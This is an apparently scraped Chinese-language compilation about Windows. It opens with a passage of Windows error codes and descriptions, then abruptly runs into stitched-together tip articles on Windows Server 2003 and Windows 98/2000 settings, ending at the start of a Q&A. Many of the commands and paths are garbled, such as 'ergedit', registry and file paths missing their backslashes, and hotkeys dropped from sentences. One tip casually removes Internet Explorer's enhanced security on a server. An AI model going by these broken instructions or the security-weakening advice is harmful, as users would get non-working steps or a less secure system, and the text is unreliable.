1018L ERROR_KEY_DELETED　　　　　　　　　　 试图在标记为删除的注册表项上运
                                            行不合法的操作。
1019L ERROR_NO_LOG_SPACE　　　　　　　　　　系统无法配置注册表日志中所请
                                            求的空间。
1020L ERROR_KEY_HAS_CHILDREN　　　　　　　　试图在一个已经有子项或数值的
                                            注册表项中创建符号链接。
1021L ERROR_CHILD_MUST_BE_VOLATILE　　　　　试图在不稳定的父项下创建稳定
                                            的子项。
1022L ERROR_NOTIFY_ENUM_DIR　　　　　　　　 表示将完成一项提示更改请求且信
                                            息不传回调用方的缓冲区内。
                                            调用方现在需要枚举文件来查找更改。
1051L ERROR_DEPENDENT_SERVICES_RUNNING　　　已将停止控制发送给与其他运行服
                                            务相关的服务。
1052L ERROR_INVALID_SERVICE_CONTROL　　　　 请求的控件对此服务无效。
1053L ERROR_SERVICE_REQUEST_TIMEOUT　　　　 服务并未及时响应启动或控制请求。
1054L ERROR_SERVICE_NO_THREAD　　　　　　　 无法为该服务创建线程。
1055L ERROR_SERVICE_DATABASE_LOCKED　　　　 服务数据库锁定。
1056L ERROR_SERVICE_ALREADY_RUNNING　　　　 服务的实例已在运行中。
1057L ERROR_INVALID_SERVICE_ACCOUNT　　　　 帐号名无效或者不存在。
1058L ERROR_SERVICE_DISABLED　　　　　　　　指定的服务禁用，无法启动。
1059L ERROR_CIRCULAR_DEPENDENCY　　　　　　 指定了循环服务依存。
1060L ERROR_SERVICE_DOES_NOT_EXIST　　　　　指定的服务不是所安装的服务。
1061L ERROR_SERVICE_CANNOT_ACCEPT_CTRL　　　服务无法在此时接受控制信息。
1062L ERROR_SERVICE_NOT_ACTIVE　　　　　　　服务没有启动。
1063L ERROR_FAILED_SERVICE_CONTROLLER_CONNECT　服务进程无法连接到服务控制器上。
1064L ERROR_EXCEPTION_IN_SERVICE　　　　　　当处理控制请求时，在服务中发生异常。
1065L ERROR_DATABASE_DOES_NOT_EXIST　　　　 指定的数据库不存在。
1066L ERROR_SERVICE_SPECIFIC_ERROR　　　　　服务已返回特定的服务错误码。
1067L ERROR_PROCESS_ABORTED　　　　　　　　 进程意外终止。
1068L ERROR_SERVICE_DEPENDENCY_FAIL　　　　 无法启动从属服务或组。
1069L ERROR_SERVICE_LOGON_FAILED　　　　　　由于登录失败而无法启动服务。
1070L ERROR_SERVICE_START_HANG　　　　　　　启动后，服务停留在启动暂停状态。
1071L ERROR_INVALID_SERVICE_LOCK　　　　　　指定的服务数据库锁定无效。
1072L ERROR_SERVICE_MARKED_FOR_DELETE　　　 指定的服务已标记为删除。
1073L ERROR_SERVICE_EXISTS　　　　　　　　　指定的服务已存在。
1074L ERROR_ALREADY_RUNNING_LKG　　　　　　 系统当前以最新的有效配置运行。
1075L ERROR_SERVICE_DEPENDENCY_DELETED　　　依存服务不存在，或已被标记为删除。
1076L ERROR_BOOT_ALREADY_ACCEPTED　　　　　 已接受使用当前引导作为最后的有效
                                            控制设置。
1077L ERROR_SERVICE_NEVER_STARTED　　　　　 自从上一次启动以后，没有再次启动
                                            过该服务。
1078L ERROR_DUPLICATE_SERVICE_NAME　　　　　名称已用作服务名或服务显示名。
1079L ERROR_DIFFERENT_SERVICE_ACCOUNT　　　 此服务的帐户不同于运行于同一
                                            进程上的其它服务的帐户。
1100L ERROR_END_OF_MEDIA　　　　　　　　　　已达磁带的实际结尾。
1101L ERROR_FILEMARK_DETECTED　　　　　　　 磁带访问已达文件标记。
1102L ERROR_BEGINNING_OF_MEDIA　　　　　　　已达磁带或磁盘分区的开头。
1103L ERROR_SETMARK_DETECTED　　　　　　　　已达磁带的设置标记。
1104L ERROR_NO_DATA_DETECTED　　　　　　　　已达磁带访问时的数据标记尾端。
1105L ERROR_PARTITION_FAILURE　　　　　　　 磁带无法分区。
1106L ERROR_INVALID_BLOCK_LENGTH　　　　　　在访问多卷分区的新磁带时，当前
                                            的块大小不正确。
1107L ERROR_DEVICE_NOT_PARTITIONED　　　　　装载磁带时，找不到磁带分区信息。
1108L ERROR_UNABLE_TO_LOCK_MEDIA　　　　　　未能锁定弹出媒体机能。
1109L ERROR_UNABLE_TO_UNLOAD_MEDIA　　　　　无法卸载媒体。
1110L ERROR_MEDIA_CHANGED　　　　　　　　　 驱动器中的介质可能已更改。
1111L ERROR_BUS_RESET　　　　　　　　　　　 复位 I/O 总线。
1112L ERROR_NO_MEDIA_IN_DRIVE　　　　　　　 无法进行磁带查询，因为驱动器中没有媒体。
1113L ERROR_NO_UNICODE_TRANSLATION　　　　　在多字节的目标代码页中，
                                            没有此 Unicode 字符可以
                                            映射到的字符。
1114L ERROR_DLL_INIT_FAILED　　　　　　　　 DLL 初始化例程失败。
1115L ERROR_SHUTDOWN_IN_PROGRESS　　　　　　系统关机正在进行。
1116L ERROR_NO_SHUTDOWN_IN_PROGRESS　　　　 因为关机正在进行中，试图终止系统关机失败。
1117L ERROR_IO_DEVICE　　　　　　　　　　　 因为 I/O 设备错误，所以无法
                                            运行此项请求。
1118L ERROR_SERIAL_NO_DEVICE　　　　　　　　没有串行设备被初始化成功。
                                            串行驱动程序将卸载。
1119L ERROR_IRQ_BUSY　　　　　　　　　　　　无法打开正在与其他设备共享
                                            中断请求(IRQ)的设备。至少有
                                            一个使用该 IRQ 的其他设备已打开。
1120L ERROR_MORE_WRITES　　　　　　　　　　 串行 I/O 操作已由另一个串行口的
                                            写入完成。(IOCTL_SERIAL_XOFF_COUNTER 已达零。)
1121L ERROR_COUNTER_TIMEOUT　　　　　　　　 由于超时，串行 I/O 操作已结束。
                                            (IOCTL_SERIAL_XOFF_COUNTER 未
    达到零。)
1122L ERROR_FLOPPY_ID_MARK_NOT_FOUND　　　　在软盘上找不到 ID 地址标记。
1123L ERROR_FLOPPY_WRONG_CYLINDER　　　　　 软盘扇区 ID 字段与软盘控制器
                                            磁道地址不相符。
1124L ERROR_FLOPPY_UNKNOWN_ERROR　　　　　　软盘控制器报告的错误，软盘驱动
                                            程序无法识别它。
1125L ERROR_FLOPPY_BAD_REGISTERS　　　　　　软盘控制器返回的结果和注册的不一致。
1126L ERROR_DISK_RECALIBRATE_FAILED　　　　 当访问硬盘时，重新校准操作失败，
                                            重试仍然失败。
1127L ERROR_DISK_OPERATION_FAILED　　　　　 当访问硬盘时，磁盘操作失败，重
                                            试仍然失败。
1128L ERROR_DISK_RESET_FAILED　　　　　　　 访问硬盘时，进行了复位，但仍不成功。
1129L ERROR_EOM_OVERFLOW　　　　　　　　　　已达磁带结尾。
1130L ERROR_NOT_ENOUGH_SERVER_MEMORY　　　　服务器存储空间不足，无法处理此
                                            命令。
1131L ERROR_POSSIBLE_DEADLOCK　　　　　　　 检测出潜在的死锁状态。
1132L ERROR_MAPPED_ALIGNMENT　　　　　　　　指定的基址或文件偏移量没有
                                            适当对齐。
1140L ERROR_SET_POWER_STATE_VETOED　　　　　改变系统供电状态的尝试被另一应
                                            用程序或驱动程序否决。
1141L ERROR_SET_POWER_STATE_FAILED　　　　　系统 BIOS 改变系统供电状态的
                                            尝试失败。
1142L ERROR_TOO_MANY_LINKS　　　　　　　　　试图在一文件上创建超过系统允
                                            许数额的链接。
1150L ERROR_OLD_WIN_VERSION　　　　　　　　 指定程序要求更新的 Windows 版本。
1151L ERROR_APP_WRONG_OS　　　　　　　　　　指定程序不是 Windows 或 MS-DOS
                                            程序。
1152L ERROR_SINGLE_INSTANCE_APP　　　　　　 无法启动指定程序的多个实例。
1153L ERROR_RMODE_APP　　　　　　　　　　　 指定的程序是为旧版的 Windows 编写的。
1154L ERROR_INVALID_DLL　　　　　　　　　　 执行该应用程序所需的库文件之
                                            一被损坏。
1155L ERROR_NO_ASSOCIATION　　　　　　　　　没有应用程序与此操作的指定文
                                            件有关联。
1156L ERROR_DDE_FAIL　　　　　　　　　　　　将命令发送到应用程序时出现错误。
1157L ERROR_DLL_NOT_FOUND　　　　　　　　　 找不到运行此应用程序所需的某
                                            个库文件。
1200L ERROR_BAD_DEVICE　　　　　　　　　　　指定的设备名无效。
1201L ERROR_CONNECTION_UNAVAIL　　　　　　　设备当前未连接上，但其为一个
                                            记录连接。
1202L ERROR_DEVICE_ALREADY_REMEMBERED　　　 试图记录先前已记录的设备。
1203L ERROR_NO_NET_OR_BAD_PATH　　　　　　　网络提供程序不接受指定的网络路径。
1204L ERROR_BAD_PROVIDER　　　　　　　　　　指定的网络提供程序名称无效。
1205L ERROR_CANNOT_OPEN_PROFILE　　　　　　 无法打开网络连接配置文件。
1206L ERROR_BAD_PROFILE　　　　　　　　　　 网络连接配置文件损坏。
1207L ERROR_NOT_CONTAINER　　　　　　　　　 无法列举空载体。
1208L ERROR_EXTENDED_ERROR　　　　　　　　　发生扩展错误。
1209L ERROR_INVALID_GROUPNAME　　　　　　　 指定组名的格式无效。
1210L ERROR_INVALID_COMPUTERNAME　　　　　　指定计算机名的格式无效。
1211L ERROR_INVALID_EVENTNAME　　　　　　　 指定事件名的格式无效。
1212L ERROR_INVALID_DOMAINNAME　　　　　　　指定域名的格式无效。
1213L ERROR_INVALID_SERVICENAME　　　　　　 指定服务名的格式无效。
1214L ERROR_INVALID_NETNAME　　　　　　　　 指定网络名的格式无效。
1215L ERROR_INVALID_SHARENAME　　　　　　　 指定的共享名格式无效。
1216L ERROR_INVALID_PASSWORDNAME　　　　　　指定的密码格式无效。
1217L ERROR_INVALID_MESSAGENAME　　　　　　 指定的消息名格式无效。
1218L ERROR_INVALID_MESSAGEDEST　　　　　　 指定的消息目标格式无效。
1219L ERROR_SESSION_CREDENTIAL_CONFLICT　　 提供的凭据与已存在的凭据集冲突。
1220L ERROR_REMOTE_SESSION_LIMIT_EXCEEDED　 试图与局域网管理器服务器建立会话，
                                            但目前与该服务器建立的会话太多。
1221L ERROR_DUP_DOMAINNAME　　　　　　　　　工作组或域名已由网络上的另一
                                            部计算机使用。
1222L ERROR_NO_NETWORK　　　　　　　　　　　网络未连接或启动。
1223L ERROR_CANCELLED　　　　　　　　　　　 用户已经取消该操作。
1224L ERROR_USER_MAPPED_FILE　　　　　　　　请求的操作无法在使用用户映射
                                            区域打开的文件上执行。
1225L ERROR_CONNECTION_REFUSED　　　　　　　远程系统拒绝网络连接。
1226L ERROR_GRACEFUL_DISCONNECT　　　　　　 网络连接已被适当地关闭了。
1227L ERROR_ADDRESS_ALREADY_ASSOCIATED　　　网络传输终结点已有与其关联
                                            的地址。
1228L ERROR_ADDRESS_NOT_ASSOCIATED　　　　　地址仍未与网络终结点关联。
1229L ERROR_CONNECTION_INVALID　　　　　　　试图在不存在的网络连接中操作。
1230L ERROR_CONNECTION_ACTIVE　　　　　　　 试图在使用中的网络连接上进行
                                            无效的操作。


WINDOWS SERVER 2003应用技巧集

《一键清理系统垃圾》

WINDOWS SERVER 2003应用技巧集

Windows Server 2003是一款凝聚了微软多年以来技术积累的全新操作系统。这是由于WindowsServer2003核心得到改进、各种设备管理获得进一步的优化，在性能方面有了长足发展。所以在相同硬件配置情况下，WindowsServer2003的启动速度和程序运行速度比Windows2000Server要快许多，尤其在低档硬件配置下和运行大型软件时表现得更加明显。其影响能力远比桌面操作系统中的WindowsXP和Windows98更加深远。但在其具体操作上与Windows 2000Server系列版本也有很大的不同，在系统安全上也存在着不同程度的隐患。为帮助各位尽快掌握和使用Win2003操作系统，特总结如下应用技巧，希望能给电脑新手带来一些帮助！

    一、取消自动保存设置

    Windows Server2003作为新一代的网络操作系统具有自己独有的设备管理模式，在调用应用程序出现错误时，系统中的Dr.Watson会自动将一些重要的调试信息保存起来，以便日后维护系统时查看。但是这些信息随时也有被黑客窥视的可能，为了重要的调试信息的整体安全，我们应该取消Dr.Watson自动保存调试信息的设置。具体步骤如下：首先打开开始菜单，选中“运行”命令，在随后打开的运行对话框中，输入注册表编辑命令“ergedit”命令，打开一个注册表编辑窗口；二是在该窗口中，用鼠标依次展开HKEY_local_machine＼software＼Microsoft＼WindowsdowsNT＼CurrentVersion＼AeDebug分支，在对应AeDebug键值的右边子窗口中，用鼠标双击Auto值，在弹出的参数设置窗口中，将其数值重新设置为“0”。三是打开系统的Windows资源管理器窗口，并在其中依次展开DocumentsandSettings文件夹、AllUsers文件夹、SharedDocuments文件夹、DrWatson文件夹，最后将对应DrWatson中的User.dmp文件、Drwtsn32.log文件删除掉。在完成上面的设置后，只需重新启动一下系统即可。今后你不用再担心自动保存设置出现问题了。

    二、取消对网站的安全设置

    新安装好WindowsServer2003操作系统在默认状态下，会将IE的安全访问级别设置为“高”，当你打开IE后，会弹出提示窗口，提示我们，是否需要将当前访问的网站添加到自己信任的站点中去；要是你不信任的话将无法对Internet进行浏览和文件下载，每次访问网页，都要经过这样的步骤。如此一来，不但会大大降低网页访问效率而且很麻烦，为此你可以按下面步骤，来取消安全提示：首先要依次执行“开始”/“设置”/“控制面板”命令，在打开的控制面板窗口中，用鼠标双击“添加和删除程序”图标，将界面切换到“添加和删除Windows组件”页面中；二是用鼠标选中“InternetExplorer增强的安全配置”选项，继续单击下一步按钮，就能将该选项从系统中删除了；最后再单击一下“完成”按钮，退出组件删除提示窗口。从今往后，你再上网的时候，IE就不会自动去检查网站的安全性了，重新设置以后你感觉是不是方便多了。

    三、取消资源共享设置

    Windows Server 2003在网络操作系统方面较Windows 2000有了很大增强，也为局域网用户在相互之间的传输信息方面带来极大方便，比如为用户提供了文件和打印共享功能等。但是不要忘了，在我们享受该功时的时候，也为黑客们提供了可乘之机，给服务器系统带来了潜在的危险。大家要注意，在用完文件或打印共享功能时，要随时将共享功能关闭—以防万一。具体步骤如下：首先执行控制面板菜单项下面的“网络连接”命令，在出现的窗口中，用鼠标右键单击“本地连接”图标；二是在打开的快捷菜单中，单击“属性”命令，这样就能打开一个“Internet协议(TCP/IP)”属性设置对话框；三是在该界面中取消“Microsoft网络的文件和打印机共享”这个选项即可；完成以上设置以后，本地计算机就没有办法对外提供文件与打印共享服务了，实践证明这种方法是很有效果的。

    四、取消用户切换设置

    Windows 2003系统为我们提供了快速用户切换功能，利用该功能我们可以很轻松地登录到系统中。不过，在享受这种轻松时的背后，也给你的系统带来了安装上的隐患，例如我们在执行系统“开始”菜单中的“注销”命令，“切换用户”时，如果再使用传统的方式来登录系统的话，系统很有可能会把本次登录当作错误处理，Windows2003系统就可能将当前登录的帐号当作非法帐号，将它锁定起来，给我们带来了很多的麻烦；遇到这种情况，我们可以按如下步骤来避免系统产生的安全隐患：首先在Windows 2003系统桌面中，单击开始菜单下面的“控制面板”命令，找到下面的“管理工具”命令，再执行下级菜单中的“计算机管理”命令，找到“用户帐户”图标，并在随后出现的窗口中单击“更改用户登录或注销的方式”；在打开的设置窗口中，将“使用快速用户切换”选项取消即可。

    五、取消关机原因的设置

    每次需要关闭系统时，Win2003系统总是要你选择关机原因，对于个人用户来说，非常麻烦！而且也没有多么大的使用意义，可禁用该功能：（1）使用组策略法：在“开始→运行”中键入“gpedit.msc”打开组策略窗口，展开“‘本地计算机’策略→计算机配置→管理模板→系统”，接着双击“显示‘关闭事件跟踪程序’”项，在弹出窗口中勾选“已禁用”项即可。（2）使用注册表法：在“开始→运行”中键入“Regedit”打开“注册表编辑器”，展开分支“HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftwindows NT”，新建一个名为“Reliability”的项，接着新建一个名为“ShutdownReasonOn”的DWORD值，将它的值设为0即可。（３）使用系统设置法：打开“控制面板→电源选项”，进入“高级”选项卡，在其中的“电源按钮”设置区域中，将“在按下计算机电源按钮时”设置为“关机”，然后单击“确定”按钮即可。这样，以后在关机时，直接按下机箱上的电源按钮，计算机就会在保存配置后直接关闭了。经过以上设置以后，在你关闭系统的时候，不再会有麻烦了。

    六、其它

    Windows Server 2003作为新一代的网络操作系统具有自己独有的设备管理模式，在安装硬件驱动程序时一定要使用经微软认证获得数字签名的驱动程序，以确保系统的稳定性和兼容性。而且在管理性方面较Windows 2000有了很大增强，利用“配置您的服务器”和“管理您的服务器”向导，即可简单、方便、有效的进行服务器角色的安装和管理。


Windows 罕见技巧全集大放送

《一键清理系统垃圾》

Windows 罕见技巧全集大放送

一、“属性”窗口技巧三则：

    1、自制热键启动应用程序

    这里以实现用“Ctrl+Alt+B”热键启动Windows里的“画笔”程序为例：(1)右击任务栏的“开始”按钮， 在弹出的菜单里选取“打开”，在打开的窗口里双击“Programs”文件夹，再双击被打开的窗口里的“附件” 文件夹。这时在附件窗口里可以看到有“画图”的图标（如果没有的，则应先在控制面版的添加删除程序里安装）。(2)右击“画图” 图标，在弹出的菜单里选取“属性”，再选择属性窗口的“快捷方式”标签。(3)使光标移至“快捷键”的文本框里（这时文本框里有个“无”字），然后按下键盘里的“B”按键，这时文本框里显示有“Ctrl+Alt+B”。单击[确定]退出即可。此后，每当按热键“Ctrl+Alt+B”，画图程序就自动被调出来了。这种方法同样适用于Windows系统的其它应用程序。

    2、改变启动“资源管理器”的默认目录

    在Windows95/98系统里，当启动“资源管理器”后，一般都是打开其默认目录C盘。我们可以通过修改“资源管理器”属性的一些数据以实现改变“资源管理器”的默认启动目录。方法是：右击“资源管理器”的图标，从弹出的菜单中点击“属性”命令，在“Windows资源定理器属性”窗口里的“目标”栏里将原来的命令改为“C:WINDOWSEXPLORER.EXE /n,/e,D:”，之后点击[确定]按钮退出即可。

    3、改变MS-DOS方式的默认目录

    一般地，在我们启动MS-DOS方式时，其默认的工作目录是：“C:Windows”，要改变其工作目录，只需找 到并右击MS-DOS方式的图标，从弹出的菜单里选择“属性”命令。在弹出的“MS-DOS方式属性”窗口里，将“ 工作目录”栏里的路径改变为自已想要的工作目录即可。以上是修改了在Windows系统下的MS-DOS方式，如果想改变“重新启动计算机并切换到MS-DOS方式”的MS-DOS的工作目录，可以用同样方法修改Windows目录下的“退出到DOS”这一文件即可。

    二、快*作规程*作五招

    1、按“Alt”键然后用鼠标双击文件或文件夹即可快速打开其属性。

    2、双击程序窗口的标题栏，窗口可在最大化与常规之间快速变换

    3、按键（或）即可快速把文件或文件夹不用进“回收站”而直接删除。

    4、用鼠标左键拖动文件到桌面，即可在桌面快速创建文件的快捷方式。

    5、打开“开始/运行”，键入网址，即可快速上网。

三、恢复默认*作系统

    一般我们在安装Windows2000时，都是在原来的*作系统中（如Windows98）再安装Windows2000而形成多 重启动的。可是在我们安装完Windows2000后，Windows2000将成为系统的默认的*作系统，如果想将原来的*作系统设置为默认系统的话，只需进行以下*作即可。依次打开“控制面板/系统/高级/启动和故障恢复”，在出现对话框的“默认的*作系统”列表中，选择 “Microsoft Windows”后确定即可。另外，也可对系统等待的时间进行调整。如果将等待时间设为“0”或取消“显示*作系统列表”，则系 统启动时将不会出现启动选择菜单而直接进入默认的*作系统。

    四、轻松控制启动程序

    Windows98下的“系统配置实用程序”是一个使用率很高的工具，通过它你可以很轻松地删除或暂时停止某些启动程序，但使用NT内核的Windows2000却没有提供类似的工具。没关系，你可以将原先Windows98安装目录下的Msconfig.exe（在System子目录中）拷贝到Windows2000的WinntSystem目录下，然后直接运行即可。程序首先会弹出一个出错消息框，提示找不到以下几个系统文件：Config.sys、Autoexec.bat、System.ini、Win.ini，这很正常，Windows2000中不需要这些文件，忽略这个错误即可，点击“确定”后你又会看到熟悉的 “系统配置实用程序”窗口。

    五、不用重新启动都可以应用修改后的注册表

    修改注册表后，保存对注册表的修改。然后同时按下“Ctrl+Alt+Del”组合键，在弹出的Windows任务列表，加亮“Explore”，单击“结束任务”，显示关机屏幕，单击“否”，稍候，弹出错误信息，单击“结束任务”，Windows浏览器即会和新的注册表一起重新装载。

    六、自动调整列宽

    大家在使用Windows的资源管理器时，都喜欢选用“查看”菜单中的“详细资料”方式，这样可获得文件或文件夹的名称、大小、类型、修改时间等属性。但有时会因为部分列宽太小而导致列中的一些信息显示不出来，手工调整又比较麻烦。此时可以通过按Ctrl键和数字键盘上的加号(+)来自动调整所有列的最佳宽度。双击两栏之间的分割线可以自动调整两栏的列宽。

    七、恢复DOS下删除的文件

    在Windows98的回收站中只有在Windows删除的内容，对于在DOS中删除的文件却无法从回收站中恢复，这时我们可以在Windows的DOS实模式下运行“Lock”命令，解除Windows对磁盘的访问限制，再使用Undel命令进 行恢复即可。

    八、显示文件扩展名

    你是否遇到过这种情况，在Windows中想把一个文件File.txt改为File.dat，改后发现却成了File.dat.txt，这其实是被隐藏了扩展名在作怪，我们只要在“我的电脑”或
“资源管理器”中选择“查看”，在下拦菜单中选“文件夹选项”，点击“查看”标签，去掉“隐藏已知文件类型的扩展名”前面的对勾就行 了。

九、自已定制文件发送

    在我们在右键选中Windows里的文件，从弹出的菜单中发现有一项“发送到”功能，一般情况下“发送到”只局限于“3.5英寸软盘”等的几样。其实，我们可以通过一定的方法，自己为“发送到”一项增添其他的选项的。下面以发送到D盘为例：

    1、首先在Windows目录下找到“SendTo”文件夹（在Windows95/98/Me下般是WindowsSendTo，而Windows2000/NT下是在WinntProfilesAdminstratorSendTo目录中）。2、在资源管理器中，将D盘的盘符用鼠标将其拖到该目录中，拖动后系统会提示“无法将该项目移动或复制到此位置。要创建此项目的快捷方式吗？”，这时点击[是]即可。此后，“发送到”一项下就多了发送到D盘的功能了。

    十、用“画图”第三色

    在“画图程序”左下角显示的前景色、后景色方块后面还有一块区域。按住Ctrl键就可以改变此处的颜色，同样按住Ctrl键就可以利用此处选中的颜色，这样，可同时使用三种颜色，在画一些画面较复杂、颜色较丰富的画时就方便多了。

    十一、在开始菜单中添加“控制面板”

    控制面板是Windows中非常重要的部分，在许多情况下都得用到它，可每次都要从容不迫“开始”“设置”然后打开“控制面板”窗口，再窗口中选择其中选项，这实在太麻烦了。其实可以把“控制面板”添加到开始菜单中，而且在鼠标指向“控制面板”时就弹出相应的选项的，方法是：右击“开始”按钮，选择“打开”命令，在弹出的窗口中新建一个文件夹，将它重命为“控制面板.{21EC2020-3AEA-1069-A2DD-08002B30309D}”，后面的一大串数字会立该消失的。此后，在开始菜单中就多了“控制面板”一项，它的子菜单中包括了“控制面板”中所有内容。

    十二、加密文件或文件夹

    利用Windows2000的加密工具，可以保护文件和文件夹，以防别人偷看。其方法是：在Windows资源管理器”中，用鼠标右键单击想要加密的文件或文件夹，然后单击[属性]。单击“常规”选项卡上的[高级]，然后选定“加密内容以保证数据安全”复选框。

    十三、在任务栏里Ctrl键的妙用

    一般地，我们要在任务栏里最小化所有的窗口只需要点击任务栏的快速启动工具栏里的“显示桌面”图标，或从右击任务栏弹出的菜单中选择“最小化所有窗口”就可以实现目的，可是当我们需要最大化所有窗口或最小化一部分而又不是所有的窗口时，可以怎样*作呢？其实，此时你只需要在任务栏里结合Ctrl键用亦可实现这一目的。

十四、Windows2000中安装Windows98应用程序

        虽然大多数Windows98的应用程序可以继续在Windows2000中运行，但也有某些Windows98的应用程序因为在运行中需要调用Windows98的API或动态连接库，所以不能在Windows2000中运行，有的程序更是连安装都不能成功。遇到这种情况时，我们不妨试试
Apcompat.exe这个小程序。这个程序位于安装光盘中的Support文件夹中。启动后，在所示界面的“Operatingsystem”中选择一个要仿真的*作系统，再在“Startthefollowingprogram”输入框中键入安装程序的文件名，点一下[OK]就搞定。

    十五、在Windows2000中使用Windows98的收藏夹

    要把Windows98下的收藏夹搬到Windows2000下，你只要把Windows98中的Windowsfavorites目录下的所有内容复制到Windows2000的documentsandsettingsadministrator（或其他用户名）favorites中，就搞定。

    十六、Windows2000的“快速重启”与“唤醒”

    在Windows2000中，按Shift键不是快速重启而是取消重新启动。在“关机”对话框的“等侍”功能是要单击鼠标的左键或右键，才能唤醒，且还有不得不重新输入一遍密码确认。

    十七、Windows2000启动失败的处理

    由于Windows2000的系统内核进行了重大的变革，所以硬件一般都要使用专门为Windows2000开发的驱动程序，过去的基于Windows98和NT的驱动程序往往不能正常工作（虽然Windows2000宣称它是基于NT内核构建的），出现这种情况时，可以按如下步骤解决：首先重新启动系统，当显示启动选择菜单时立即按下[F8]键，调出高级启动选项菜单。此时用户可以选择“安全模式”或“最后一次正确的配置”方式启动，进入Windows2000后，在“设备管理器”中把出现冲突的硬件删除掉，如果手头有For2000的驱动程序可直接安装，若没有可到微软的网http://www.microsoft.com.cn/hwtest/hcl）下载专门的驱动程序后安装。

    十八、恢复Windows2000的软关机功能

    很多用户在安装了Windows2000后可能会发现原来Windows98中方便的软关机功能失效了。出现此类问题的原因主要是Windows2000的电源管理功能要求主板必须支持ACPI（ACPI是由Intel、MIcrosoft、TOSHIBA所共同制定的一种高级电源管理技术）。实际上很多采用APM电源管理的主板（如精英P6BAT-AP）虽然不完全支持ACPL，但也可以轻松实现软关机的。方法是：依次打开“控制面板/电源选项/高级电源管理”，出现对话框，将其中的“启用高级电源管理支持”勾选定，一般都可得到解决。如果还不行的话，可以到主板厂商的网站上，查看BIOS升级程序是否支持Windows2000的ACPI功能，下载回来后刷新主板的BIOS就行了。

    十九、在Windows系统中实现定时关机

    现在某些较新的主板上已经集成了定时关机的功能，给用户带来了方便。可是如果主板没有此功能，以想利用现有的条件来实现定时关机的功能，该怎么办呢？下面就介绍一下如何在Windows中实现这一功能。当然你的主板要支持软件关机功能，否则你还得亲自去按电源开关。首先双击任务栏上的“计划任务”小图标，然后双击“添加已计划的任务”，浏览到目录的Rundll32.exe文件，单击“打开”按钮，在出现的对话框中键入该任务的名字（如“定时关机”），执行方式选择“每天”。然后选择定时关机时间（可以先试一下比现在机器上显示的时间晚2-3min），下一步选中“当单击‘完成’打开该任务的高级属性”，单击“完成”按钮，当然也可以先单击“完成”，然后右击“定时关机”来打开它的属性。在运行栏输入“D:WINDOWSRUNDLL32.EXEUSER.EXE，EXITWINDOWS”，单击“确定”后，稍等一会儿，看看你的计算机是不是真的关机了。当然先要保证你的文件都已经存盘。

    二十、实现“一键关机”

    每次用完电脑后关机，我们通常要用鼠标按四次：“开始/关闭系统/关闭计算机/确定”。再不的，说按组合键“Alt+F4”/关闭计算机/确定”，虽然少了一步亦也很是麻烦。利用下面的就可实现一键关机：1、首先在桌面的空白处单击鼠标右键，新建一个“快捷方式”。2、在创建快捷方式的“命令行”中输入以下的指令：“C:windowsRUNDLL32.EXEuser,ExitWindows”。3、按着鼠标选择“下一步”，在快捷方式的名称栏中输入“一键关机”或其他自己喜欢的名称。4、之后，你就会在桌面见到一个名为“一键关机”的快捷方式图标，在该图标上单击鼠标右键，选择“属性”，再进入“快捷方式”页，然后在“快速键一栏内随便按选一个功能键（如F1-F12）。建议大家最好选一个平时不常用的功能键，最后按确定退出即可。

    二十一、文件隐藏技巧三则

    1、最简单的方法

    右击想要隐藏的文件或文件夹，在弹出的菜单中选取“属性”，然后在属性窗口的复选框中选中“隐藏”。接着在“我的电脑”或“资源管理器”中选取“查看”，再在下拉菜单中选“文件夹选项”，在“文件夹选项”窗口里点选“查看”标签，在“高级设置”栏的中“隐藏文件”一项中点选“不显示隐藏文件”或点选“不显示隐藏文件或系统文件”，之后单击“确定”即可。当自己想用的时候，只要在上述的“文件夹选项”窗口中设成“显示所有文件”就行了。当然，由于方法简单，其保密性也不高。

    2、警告信息法

    一般Windows系统的文件夹里都有folder.htt和desktop.ini这两个文件，访问此文件夹时的警告信息就是由这两个文件产生的，我们要做的就是把这两个文件拷到我们自己的文件夹里，然后把文件夹的属性设为只读。访问一下看看，怎么样？有警告信息了吧？没有的话，在“文件夹选项”里选择“Wed风格”。如果想改变提示信息，那得先弄明白提示信息是怎么来的，folder.htt实际上是一个HTML文件，desktop.ini的作用是使窗口显示folder.htt中的内容。如果想改变提示信息的话，只要改一下folder.htt里的内容就行了。用记事本或制作网页的软件打开这个文件，找到varL-Intro-Text这一行，这行是警告信息，只要符合HTML语法写些什么都行。下面的varL-Prompt1-Text是进入文件夹的链接，如果你懂javascript的话，就可尽情发挥了！继续向下看，快到结尾的地方有这样一行：这是你看到的图片的链接，当然也可以自己修改。把自己喜欢的图片拷到这个文件里，例如temp.jpg。然后把%TEMPLATEDIR%wvlogo.gif改成%THISDIRPATH%emp.jpg。这样窗口右半部就显示你指定的图片了。只是这种方法“只防君子不防小人”，因而保密性亦不高，这时可以参考下一种方法。

    3、文件夹隐藏法

    既然我们能改变警告信息，我们就可以把它改得和一个空文件夹一模一样，再把文件夹改成一个奇怪的名字，放在一个一般人想不到的地方，即使有人误打误撞进入了文件夹，也不会想到这个文件夹不是空的。具体做法很简单，把varL-Prompt-Text这一行的值改为“选定项目可以查看其说明。”然后把varL-Intro-Text清空。再找个绘图软件创建一个只有一个像素大的图片，替换掉第三步中的temp.jpg就行了。访问一下看看吧，是不是和空文件夹一样？你自己想访问它的时候，可以把文件夹的只读属性去掉。这个方法也不是万无一失的，不信的话，你在窗口的地址栏里加一个“”看看,哈！露馅了吧！想做到万无一失，且看下招。在此文件夹下新建一个文件夹，把紧要的文件放到文件夹下。再把这个文件夹和那个temp.jpg的属性都改成隐藏。再加个“”试试，没有刚才的现象了吧。这种方法虽然操作效为麻烦，但保密性较高！


排忧解难 Windows操作系统十二则高级技巧

《一键清理系统垃圾》

排忧解难 Windows操作系统十二则高级技巧

时间：2005年12月27日09:50　 我来说两句(0)

【来源：中关村在线】

第1页第2页第3页
    Windows操作系统我们已经用得很熟了，但是一些奇怪的故障和问题还是时常困扰着我们，看了以下的问答，相信可以解答你的一些疑问。

    ★安装longhorn出现错误

    问：我现有的系统是Windows XP，在安装Windows longhorn到一半的时候，系统却提示“can＇t edit boot．ini”，请问为什么会这样，应该如何解决才能正常安装呢？

    答：错误提示已经告诉你了，不能编辑Boot.ini文件所造成的安装失败。

你可以这样解决问题：在Windows XP下打开“我的电脑”，选择“工具→文件夹选项→查看”，设置显示所有隐藏文件和受系统保护的文件，然后找到Boot.ini文件，将它的只读属性去掉，换为存档属性。重新安装就不会出现错误了。

    ★禁止媒体文件预览

